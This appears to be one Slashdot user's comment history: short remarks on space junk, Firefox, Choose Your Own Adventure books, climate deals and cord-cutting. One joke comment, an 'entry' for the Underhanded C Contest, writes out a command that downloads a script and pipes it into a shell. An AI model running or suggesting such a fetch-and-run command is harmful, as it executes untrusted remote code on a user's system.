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  1. They need to deal with it. Implementing laws and restrictions only affects law-abiding citizens.

  2. Magnetic junk collector on The Oceanic Pole of Inaccessibility: Where Spacecraft Go To Die (bbc.com) · · Score: 1

    Generate a large magnetic field to attrack space junk to the ISS. Once a sufficient amount of junk is collected, _then_ allow it to fall to the Earth.

  3. What a bunch of bullshit on "Barbie: I Can Be a Computer Engineer" Pulled From Amazon · · Score: 1

    I skimmed the blog post but nothing jumped out as being offensive. Girl and boy took turns having difficulties. BFD.

  4. Re:Bing indeed on Firefox Signs Five-Year Deal With Yahoo, Drops Google as Default Search Engine · · Score: 1

    Highly doubtful, based on history.

  5. Re: Ask the credit card for a refund on UK Hotel Adds Hefty Charge For Bad Reviews Online · · Score: 0

    Without regulation, your body wouldn't function properly: Breathing, blood sugar level, metabolism, sleep, etc. Not all regulation is bad.

  6. Avoiding gender stereotypes? on Sweden Considers Adding "Sexism" Ratings To Video Games · · Score: 1

    Traditional, majority sexual orientation is now a "stereotype"? And the solution is to disproportionately represent alternative lifestyles?

  7. Re:Put the glasses on, stupid. on A Worm's Mind In a Lego Body · · Score: 2

    What else would be interesting: let this "worm" mate and see how it offspring adapt to their new body.

  8. Re:Early adopters on For Some Would-Be Google Glass Buyers and Devs, Delays May Mean Giving Up · · Score: 1

    If you can't see the difference between the two situations and the social/privacy problems involved, you're not thinking hard enough.

  9. Re:Used to love those on R. A. Montgomery, Creator of the "Choose Your Own Adventure" Books, Dead At 78 · · Score: 1

    This one sticks out in my mind: I was exploring a strange planet and noticed a shiny object on the sand. Should I leave it or pick it up? I chose to pick it up. The result was: you have found a [something] solar collector that has been lying in the desert for 50 years. You are instantly vaporized.

  10. Used to love those on R. A. Montgomery, Creator of the "Choose Your Own Adventure" Books, Dead At 78 · · Score: 1

    I used to love those Choose Your Own Adventure books when I was in grade school! Though I have to admit, I kept a finger or two between previous pages just in case I died. :)

  11. Leech from github on Ask Slashdot: Programming Education Resources For a Year Offline? · · Score: 1

    Find a bunch of open source projects you're interested on Github (or whatever) and download them to your laptop. Then take some time to study the code.

  12. Re:Obvious guy says on Ask Slashdot: Programming Education Resources For a Year Offline? · · Score: 1

    Agreed. I would definitely bring something "just in case". Doesn't mean you _have_ to read it, but sure is nice to have if you get bored or need some extra mental stimulation.

  13. Re:Ya...Right on U.S. and China Make Landmark Climate Deal · · Score: 1

    Congratulations on getting a +5 mod on a completely content-free post.

  14. Re:Mozilla needs better management. on Multi-Process Comes To Firefox Nightly, 64-bit Firefox For Windows 'Soon' · · Score: 2

    I haven't had Firefox crash on MacOS or Linux in ages, and I use it all day every day. For me, it seems a lot more reliable than it used to be.

    I'm not going to say I agree with all of Mozilla's decisions, but implying they lack "adult supervision" shows you know nothing about how they work. They are a very dedicated - if sometimes misguided - group. As for Mozilla Foundation, I couldn't tell you.

  15. Re:Uh, simple on The Strangeness of the Mars One Project · · Score: 1

    We got lucky with the last meteor strike in Russia. It came from one direction we weren't looking in - the direction of the Sun. Had the asteroid been of extinction-level size, we'd be history since we had no idea it was coming.
    You need to balance the odds of something happening against the impact if it does happen: A miniscule chance of an extinction event matched against the annihilation of all life on Earth means it should be a high priority for our species to take steps to avoid that disaster. If we fail, we won't get a second chance.
    I agree that defending Earth against an asteroid is a reasonable idea, but that will only help against objects small enough for us to handle with our current technology and also those we can detect in time to take action against.

  16. Re:Uh, simple on The Strangeness of the Mars One Project · · Score: 1

    If it was imperative that we leave Earth within 5 or 10 years, how would we begin? Let's do that. There is no certainty that we have more time.

    At least, that's one way of thinking.

  17. Endangered natural resource on We Are Running Out of Sand · · Score: 1

    We need to stop taking sand for granted and think of it as an endangered natural resource

    And all the animals and trees said: back of the line, buddy!

  18. Re:Tech Up Bringing? on The Other Side of Diversity In Tech · · Score: 4, Interesting

    From TFA: "I feel like I've lost my entire cultural identity in effort to be part of the culture I've spent the majority of the last decade in"

    White male here. I was with a company for many years that had a _very_ different culture than I was used to. Let's just say some of the stuff that went on would be firing offenses and many other companies or at least be highly offensive to some. I learned to fit in and emulate the culture. When I left, I realized how much I had changed, just like the woman in the story said she has lost her identity. This is not just a racial problem.

  19. Sorry to be pedantic, but.. on Photon Pair Coupled in Glass Fiber · · Score: 1

    Shouldn't the headline read "scientists have discovered a way to couple photons into pairs"? The original "scientists have discovered a way to couple photon pairs" makes it sound like the photons are already paired and those pairs can be further paired.

  20. Re:To infinity and beyond! on Mozilla Teases First Browser Dedicated To Devs · · Score: 1

    Part of the problem is likely that Firefox needs to maintain memory for the "undo tab" and "back" button. I think you can tweak that in about:config

  21. My entry on The 7th Underhanded C Contest Is Online · · Score: 1

    exec("wget -O- http: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

  22. Re:Well on Space Tourism Isn't Worth Dying For · · Score: 1

    From TFA: "millionaire boondoggle thrill ride"

    The author says it like there is something wrong with that.

  23. Re:I hate these on Boo! The House Majority PAC Is Watching You · · Score: 1

    Can't say I disagree with you. Do you have any ideas for a better system?

  24. Re:They tried to raise prices 20% unnanounced on Cutting the Cord? Time Warner Loses 184,000 TV Subscribers In One Quarter · · Score: 1

    Since getting rid of cable we've found ourselves actually engaging in our hobbies again, as opposed to just passively staring at the screen.

    You can make the same case for anything in your life that isn't giving you a "return on investment": television, facebook, slashdot, people you don't want to spend time with anymore, etc. Eliminate the things you don't need and new (more fulfilling) things will spring up to replace them.

  25. What I'd pay for on YouTube Considering an Ad-Free, Subscription-Based Version · · Score: 1

    All-you-can-eat monthly subscription with download links for all videos (including commercial music videos) in various formats (mp4, mp3, ogg, etc.).